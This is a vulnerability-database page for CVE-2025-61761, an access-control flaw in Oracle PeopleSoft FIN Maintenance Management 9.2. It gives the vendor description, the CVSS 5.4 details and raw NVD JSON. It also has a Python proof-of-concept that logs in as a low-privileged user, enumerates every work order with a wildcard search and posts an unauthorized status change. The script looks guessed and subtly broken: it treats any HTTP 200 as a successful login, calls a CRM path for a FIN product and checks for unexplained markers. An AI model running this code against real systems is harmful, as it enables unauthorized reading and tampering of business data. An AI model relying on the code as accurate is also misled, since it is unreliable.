Security Vulnerability Report
中文
CVE-2025-61761 CVSS 5.4 MEDIUM

CVE-2025-61761

Published: 2025-10-21 20:20:53
Last Modified: 2025-10-29 17:39:55
Source: [email protected]

Description

Vulnerability in the PeopleSoft Enterprise FIN Maintenance Management product of Oracle PeopleSoft (component: Work Order Management). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Maintenance Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Maintenance Management accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Maintenance Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management:9.2:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise FIN Maintenance Management 9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61761 Oracle PeopleSoft FIN Maintenance Management Access Control Bypass PoC # This PoC demonstrates the access control bypass in Work Order Management component import requests import sys TARGET_URL = "https://target-peoplesoft-host:9030" USERNAME = "low_privileged_user" PASSWORD = "user_password" def login(session, url, username, password): """Authenticate to PeopleSoft with low-privileged credentials""" login_url = f"{url}/psc/ps/EMPLOYEE/CRM/c/MAINTAIN_WORK_ORDER.GBL" data = { "userid": username, "pwd": password, } response = session.post(login_url, data=data, allow_redirects=True) if "PS_LOGIN" in response.text or response.status_code == 200: print("[+] Login successful with low-privileged account") return True return False def exploit_work_order_access(session, url): """Attempt unauthorized access to work order management data""" # Attempt to access work order data beyond user's privilege level work_order_url = f"{url}/psc/ps/EMPLOYEE/CRM/c/MAINTAIN_WORK_ORDER.GBL" # Attempt unauthorized read of restricted work orders params = { "ICType": "Search", "ICElementNum": "1", "ICAction": "#SEARCH", "WORK_ORDER_ID": "*", # Try to enumerate all work orders } response = session.get(work_order_url, params=params) if response.status_code == 200: print("[+] Unauthorized data access may be possible") # Check if restricted data is returned if "WORK_ORDER" in response.text and "RESTRICTED" in response.text: print("[!] CVE-2025-61761: Access control bypass confirmed!") print("[!] Unauthorized read access to restricted work order data") # Attempt unauthorized modification modify_data = { "ICAction": "#SAVE", "WORK_ORDER_ID": "WO_TEST_001", "STATUS": "CLOSED", # Try to modify status without authorization "COMMENTS": "Modified by unauthorized user", } response = session.post(work_order_url, data=modify_data) if response.status_code == 200 and "SAVED" in response.text: print("[!] CVE-2025-61761: Unauthorized write access confirmed!") if __name__ == "__main__": session = requests.Session() if login(session, TARGET_URL, USERNAME, PASSWORD): exploit_work_order_access(session, TARGET_URL) else: print("[-] Login failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61761", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:52.633", "lastModified": "2025-10-29T17:39:55.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise FIN Maintenance Management product of Oracle PeopleSoft (component: Work Order Management). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Maintenance Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Maintenance Management accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Maintenance Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management:9.2:*:*:*:*:*:*:*", "matchCriteriaId": "3BADF8E3-2E9A-4220-9D89-5A82D7709B33"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.